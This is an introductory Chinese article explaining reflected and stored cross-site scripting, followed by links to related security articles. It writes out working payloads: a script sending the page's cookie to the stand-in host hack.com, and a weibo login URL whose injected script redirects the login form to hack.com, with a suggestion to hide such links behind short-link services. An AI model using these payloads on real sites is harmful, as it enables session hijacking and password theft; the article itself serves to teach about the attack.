谈论XSS

简介:

XSS 叫跨站脚本攻击(Cross Site Script),那么XSS原本应该叫做CSS,但是由于CSS的简称已经被连级样式表 使用了,所以就换个称谓XSS。

为什么叫做跨站脚本攻击呢?

它的意思就是在别人的网站上嵌入脚本,而这个脚本原本不是属于这个网站的。这个解释很直观吧。

怎么嵌入脚本呢?

image

比如这么个搜索结果页,当用户搜索test的时候,页面会显示“搜索关键词:test”

这个时候,这里的test就很有可能会出现xss漏洞,如果该页面是直接将用户输入的东西“返回”到页面上,那么存在的xss漏洞就可以这样利用:

输入:<script>alert(1);</scrip>

那么页面就会跳出alert(1);

这种XSS叫做反射性XSS。

 

再谈论另外一种场景,每个网站都有反馈框。允许用户反馈数据给后台。

而这个后台一般都是管理员进行审核,会在管理后台展示。

如果一个<script>var x=new Image(); x.src=”http://hack.com?cookie=”+document.cookie;</script>的反馈数据由用户输入

然后这个数据“直接”返回到管理后台上,那么这个时候,管理后台管理员的cookie就被作为参数传递到http://hack.com 了。后面黑客就可以使用cookie来做登录管理后台了。

这种XSS由于攻击代码存储进数据库了,所以叫做存储型XSS。

危害

一般来说,存储型XSS的危害性大于反射型XSS。因为反射型XSS只会影响到自己,而存储型的XSS可能会影响到网站的其他用户。

XSS可以如上面例子说的:

1 盗取cookie

2 钓鱼

比如我将一段代码注入进某个网站的支付页面,这段js代码做的事情是,动态控制这个支付页面的Form表单,比如将这个form表单的html替换成目标网站一个相似的html。

或者另一个案例是使用反射型XSS,我预先生成一个url,这个url是一个有反射型xss漏洞的页面。比如document.getElementById(“loginForm”).action=”http://hack.com”http://weibo.com/login?username=<script>document.getElementById(“loginForm”).action=”http://hack.com”</script> ,然后我将这个页面通过qq的群邮件发给qq群中的所有人,一旦有人点击这个链接,那么就会进入微博登陆页,万一再输入用户名密码,那么这个人的用户名密码就会被盗了。当然,这个案例有个问题,url太假了,怎么办?短链接服务。现在有很多厂商提供了短连接的服务。那么最后的链接是实际看不出来问题的。

3 DDOS攻击

当然这个前提是有大量用户已经被XSS攻击了,所以他们浏览的页面已经被植入了代码,这个代码的作用就是循环向一个网站发送请求,如果有xss漏洞的这个网站是有大量用户的,比如微博,那么后一个被DDOS攻击的网站就真心惨了。

总之,XSS的危害就在于网站的页面可以被随意嵌入js代码。

目录
相关文章
|
2月前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
117 1
|
6月前
|
前端开发 网络安全
【XSS平台】使用,网络安全开发必学
【XSS平台】使用,网络安全开发必学
|
11月前
|
JavaScript 前端开发 安全
2023年中职“网络安全“—JavaScript安全绕过
2023年中职“网络安全“—JavaScript安全绕过
90 0
|
存储 JavaScript 前端开发
网络安全——XSS之被我们忽视的Cookie
Cookie在我们身边一直被大家所使用着,但却一直被忽视,那我们今天就一起来看看到底什么是Cookie,和我们的网络安全又有什么联系呢
4263 10
网络安全——XSS之被我们忽视的Cookie
|
存储 JavaScript 安全
网络安全 | 了解XSS的基本知识
今天到了分享我最喜欢的东西,一些网络安全有关的东西。
|
前端开发 JavaScript 安全
前端培训-初级阶段-xss相关
前端最基础的就是 HTML+CSS+Javascript。掌握了这三门技术就算入门,但也仅仅是入门,现在前端开发的定义已经远远不止这些。前端小课堂(HTML/CSS/JS),本着提升技术水平,打牢基础知识的中心思想,我们开课啦(每周四)。 这块内容是在会后又加了一节(老板说要处理这块内容)。之前其实就做过一期这样的内容XSS_跨站脚本攻击
101 0
前端培训-初级阶段-xss相关
|
存储 安全 数据安全/隐私保护
|
安全 JavaScript 数据格式
|
Web App开发 JavaScript